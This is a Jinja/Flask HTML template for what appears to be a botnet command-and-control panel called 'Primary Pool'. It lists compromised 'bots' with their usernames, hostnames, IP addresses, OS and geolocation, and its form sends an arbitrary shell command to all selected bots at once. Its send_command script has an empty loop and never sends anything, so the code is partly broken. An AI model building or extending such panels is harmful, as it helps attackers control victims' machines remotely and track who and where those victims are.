{% with previous_page=url_for('webui.index'), title="Primary Pool" %}
{% include "header.html" %}
{% endwith %}

<div class="container">
  <section id="main_content">

      <form method="post" action="{{ url_for('api.mass_execute') }}">
      <input type="text" name="cmd" id="cmd" style="width:50%" />
      <input type="submit" name="execute" value="Run on selection" />
      <input type="submit" name="delete" value="Delete selection" onclick="return confirm('Remove selected bots from pool ?')"/>

      <table class="dash">
      <tr><th>Name</th><th>Last Online</th><th>User</th><th>Host</th><th>IP</th><th>OS</th><th>Geolocation</th><th>Change name</th><th>Sel.</th></tr>
      {% for bot in bots %}
      <tr >
        <td><a href="{{ url_for('webui.bot_detail', bot_id=bot.id) }}" style="text-decoration: none">{{bot.display_name}}</a>  </td>
        <td>{% if bot.last_online %}{% if bot.is_online() %}ONLINE{%else%}{{bot.last_online.strftime('%Y/%m/%d %H:%M')}}{%endif%}{% endif %}</td>
        <td>{{bot.username}}</td>
        <td>{{bot.hostname}}</td>
        <td>{{bot.remote_ip}}</td>
        <td>{{bot.operating_system}}</td>
        <td>{{bot.geolocation}}</td>
        <td><a href="#" onclick="changeName('{{bot.id}}', '{{bot.display_name}}')" style="text-decoration: none">Change name</a></td>
        <td><input type="checkbox" id="checkbox_{{bot.id}}" name="selection" value="{{bot.id}}" /></td>
      {% endfor %}
      </table>
      </form>
  </section>
</div>

<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script>
function changeName(botid, name) {
    var newname = prompt("New alias", name);
    $.post("{{ url_for('webui.rename_bot') }}", {'newname': newname, 'id': botid}, function() {window.location.reload();});
}

function keypressed(e){
    if(e.keyCode === 13){
        send_command();
    }
    return false;
}
function send_command(e) {
    if(!$(".botid:checked").length){
      alert('Select at least one bot device.');
      return;
    }
    $(".botid:checked").each(function(){
      
    });
    $('#cmd').val('');
    return false;
}
</script>

{% include "footer.html" %}
